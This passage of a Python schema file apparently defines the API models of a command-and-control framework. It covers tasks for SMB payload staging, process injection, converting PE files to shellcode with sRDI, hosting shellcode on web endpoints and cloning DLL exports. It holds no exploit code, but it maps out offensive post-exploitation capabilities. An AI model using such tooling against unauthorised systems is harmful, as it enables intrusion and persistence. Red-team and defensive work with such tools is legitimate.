        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    config: Optional[ServiceConfigInResponse] = Field(
        None,
        description="Full service configuration",
        example={
            "displayName": "My Service",
            "binaryPath": "C:\\Windows\\service.exe",
            "startName": "NT AUTHORITY\\SYSTEM",
            "serviceType": "win32_own_process",
            "startType": "demand_start",
            "errorControl": "error_ignore",
            "description": "Do secret things",
            "loadOrderGroup": "",
            "dependencies": ["spoolsv"],
            "requiredPrivileges": ["SeDebugPrivilege"],
            "processId": 1234,
            "exitCode": 0,
            "currentState": "running",
        },
        title="Config",
    )


class ServiceStartResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


class ServiceStopResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


class ShareAddResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


class ShareDeleteResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


class ShareInfo(Schema):
    remote: str = Field(
        ...,
        description="Remote resource path",
        example="\\\\REMOTE\\Data",
        title="Remote",
    )
    local: Optional[str] = Field(
        None,
        description="Local resource path (drive letter)",
        example="D:",
        title="Local",
    )
    scope: ShareScope = Field(..., description="Resource scope", example="connected")
    rtype: ShareType = Field(..., description="Resource type", example="disk")
    dtype: ShareDisplayType = Field(..., description="Resource display type", example="share")


class ShareListResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    shares: Optional[List[ShareInfo]] = Field(
        [],
        description="Network shares in the current session",
        example=[
            {
                "remote": "\\\\REMOTE\\C$",
                "scope": "connected",
                "rtype": "disk",
                "dtype": "share",
            },
            {
                "remote": "\\\\SERVER\\Data",
                "local": "D:",
                "scope": "remembered",
                "rtype": "disk",
                "dtype": "share",
            },
        ],
        title="Shares",
    )


class SmbStageResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


class TaskDetails(Schema):
    id: UUID = Field(..., title="Id")
    tool: Tool
    command: str = Field(..., title="Command")
    instance_id: Optional[UUID] = Field(None, alias="instanceId", title="Instanceid")
    instance_tag: Optional[str] = Field(None, alias="instanceTag", title="Instancetag")
    instance_name: Optional[str] = Field(None, alias="instanceName", title="Instancename")
    owner_id: Optional[UUID] = Field(None, alias="ownerId", title="Ownerid")
    owner: Optional[str] = Field(None, title="Owner")
    created_at: datetime = Field(..., alias="createdAt", title="Createdat")
    updated_at: datetime = Field(..., alias="updatedAt", title="Updatedat")
    delivery: TaskDelivery
    status: TaskStatus
    context: TaskContext
    arguments: TaskArguments
    results: TaskResults

    class Config:
        extra = "allow"


class TasksWithCursor(Schema):
    next_cursor: Optional[int] = Field(None, alias="nextCursor", title="Nextcursor")
    tasks: List[TaskDetails] = Field(..., title="Tasks")


class UserInCreate(Schema):
    username: str = Field(..., max_length=25, title="Username")
    password: str = Field(..., max_length=100, title="Password")
    role: UserRole
    is_active: Optional[bool] = Field(True, alias="isActive", title="Isactive")


class UserInResponse(Schema):
    id: UUID = Field(..., title="Id")
    username: str = Field(..., max_length=25, title="Username")
    role: UserRole
    is_active: bool = Field(..., alias="isActive", title="Isactive")


class UserInUpdate(Schema):
    username: Optional[str] = Field(None, max_length=25, title="Username")
    password: Optional[str] = Field(None, max_length=100, title="Password")
    role: Optional[UserRole] = None
    is_active: Optional[bool] = Field(None, alias="isActive", title="Isactive")


class BlobReferenceOrPayloadOrData(Schema):
    id: Optional[str] = Field(None, description="Blob identifier", title="Id")
    name: Optional[str] = Field(None, description="Contextual name", title="Name")
    data: Optional[bytes] = Field(None, description="Raw data", title="Data")
    payload: Optional[PayloadSeed] = Field(None, description="Payload seed", title="Payload")


class ClientScriptResults(Schema):
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    output: Optional[List[ScriptOutput]] = Field(
        [],
        description="Script output entries",
        example=[{"type": "out", "message": "[+] Done."}],
        title="Output",
    )


class FileUploadArguments(Schema):
    data: BlobReferenceOrPayloadOrData = Field(
        ..., description="File data to write", example="EXAMPLE_BLOB", title="Data"
    )
    path: str = Field(
        ...,
        description="Remote file path (supports environment variables)",
        example="C:\\Windows\\upload.ext",
        title="Path",
    )
    force: Optional[bool] = Field(
        False,
        description="Overwrite the target file if needed",
        example=False,
        title="Force",
    )


class HostShellcodeArguments(Schema):
    srdi_exported_function: Optional[str] = Field(
        "none",
        alias="srdiExportedFunction",
        description="Exported function to execute post load [sRDI]",
        example="MyExport",
        title="Srdiexportedfunction",
    )
    srdi_user_data: Optional[BlobReferenceOrData] = Field(
        {"id": "null", "size": 0},
        alias="srdiUserData",
        description="User data to pass to exported function [sRDI]",
        example="user_data",
        title="Srdiuserdata",
    )
    srdi_flags: Optional[int] = Field(
        0,
        alias="srdiFlags",
        description="Configuration flags for loading process [sRDI]",
        title="Srdiflags",
    )
    encoding: Optional[HostingEncoding] = Field("base64", description="Encoding for binary data", example="base64")
    base_url: Optional[str] = Field(
        "",
        alias="baseUrl",
        description="Base URL (default is from profile)",
        example="http://mycustom.com",
        title="Baseurl",
    )
    endpoint: str = Field(
        ...,
        description="Web endpoint path to host data",
        example="/custom",
        title="Endpoint",
    )
    payload: BlobReferenceOrPayloadOrData = Field(
        ...,
        description="Payload or blob to convert to shellcode and host",
        title="Payload",
    )


class InjectArguments(Schema):
    srdi_exported_function: Optional[str] = Field(
        "none",
        alias="srdiExportedFunction",
        description="Exported function to execute post load [sRDI]",
        example="MyExport",
        title="Srdiexportedfunction",
    )
    srdi_user_data: Optional[BlobReferenceOrData] = Field(
        {"id": "null", "size": 0},
        alias="srdiUserData",
        description="User data to pass to exported function [sRDI]",
        example="user_data",
        title="Srdiuserdata",
    )
    srdi_flags: Optional[int] = Field(
        0,
        alias="srdiFlags",
        description="Configuration flags for loading process [sRDI]",
        title="Srdiflags",
    )
    process: Optional[str] = Field(
        "",
        description="Process name/pid to inject into (otherwise local)",
        example="explorer.exe",
        title="Process",
    )
    payload: BlobReferenceOrPayloadOrData = Field(
        ...,
        description="Payload data to inject",
        example="EXAMPLE_PAYLOAD",
        title="Payload",
    )
    technique: Optional[InjectionTechnique] = Field(
        "standard", description="Injection technique/procedure", example="standard"
    )
    skip_conversion: Optional[bool] = Field(
        False,
        alias="skipConversion",
        description="Skip sRDI conversion (payload is already shellcode)",
        example=False,
        title="Skipconversion",
    )


class SmbStageArguments(Schema):
    srdi_exported_function: Optional[str] = Field(
        "none",
        alias="srdiExportedFunction",
        description="Exported function to execute post load [sRDI]",
        example="MyExport",
        title="Srdiexportedfunction",
    )
    srdi_user_data: Optional[BlobReferenceOrData] = Field(
        {"id": "null", "size": 0},
        alias="srdiUserData",
        description="User data to pass to exported function [sRDI]",
        example="user_data",
        title="Srdiuserdata",
    )
    srdi_flags: Optional[int] = Field(
        0,
        alias="srdiFlags",
        description="Configuration flags for loading process [sRDI]",
        title="Srdiflags",
    )
    host: str = Field(..., description="Hostname or IP address", example="ADAM-PC", title="Host")
    payload: BlobReferenceOrPayloadOrData = Field(
        ..., description="Payload to stage", example="EXAMPLE_PAYLOAD", title="Payload"
    )
    migrate: Optional[str] = Field(
        "local",
        description="Migrate to this process during stage (otherwise `local`)",
        title="Migrate",
    )
    pipe: Optional[str] = Field(
        "",
        description="Named pipe for stage delivery (default = profile['stagers']['native']['pipe'])",
        title="Pipe",
    )
    convert: Optional[bool] = Field(False, description="Convert to shellcode before delivery", title="Convert")
    timeout: Optional[int] = Field(
        0,
        description="Named pipe timeout in seconds (default = profile['smb']['timeout'])",
        title="Timeout",
    )


class TransformPeCloneExports(Schema):
    target: BlobReferenceOrPayloadOrData = Field(
        ...,
        description="Target PE file data",
        example="EXAMPLE_PAYLOAD",
        title="Target",
    )
    reference: BlobReferenceOrData = Field(
        ...,
        description="Reference PE file data",
        example="EXAMPLE_BLOB",
        title="Reference",
    )
    reference_path: str = Field(
        ...,
        alias="referencePath",
        description="Reference file path on disk during load",
        example="C:\\Windows\\System32\\wkscli.dll",
        title="Referencepath",
    )


class TransformPeConvertToShellcode(Schema):
    srdi_exported_function: Optional[str] = Field(
        "none",
        alias="srdiExportedFunction",
        description="Exported function to execute post load [sRDI]",
        example="MyExport",
        title="Srdiexportedfunction",
    )
    srdi_user_data: Optional[BlobReferenceOrData] = Field(
        {"id": "null", "size": 0},
        alias="srdiUserData",
        description="User data to pass to exported function [sRDI]",
        example="user_data",
        title="Srdiuserdata",
    )
    srdi_flags: Optional[int] = Field(
        0,
        alias="srdiFlags",
        description="Configuration flags for loading process [sRDI]",
        title="Srdiflags",
    )
    target: BlobReferenceOrPayloadOrData = Field(
        ...,
        description="PE file data to convert",
        example="EXAMPLE_PAYLOAD",
        title="Target",
    )
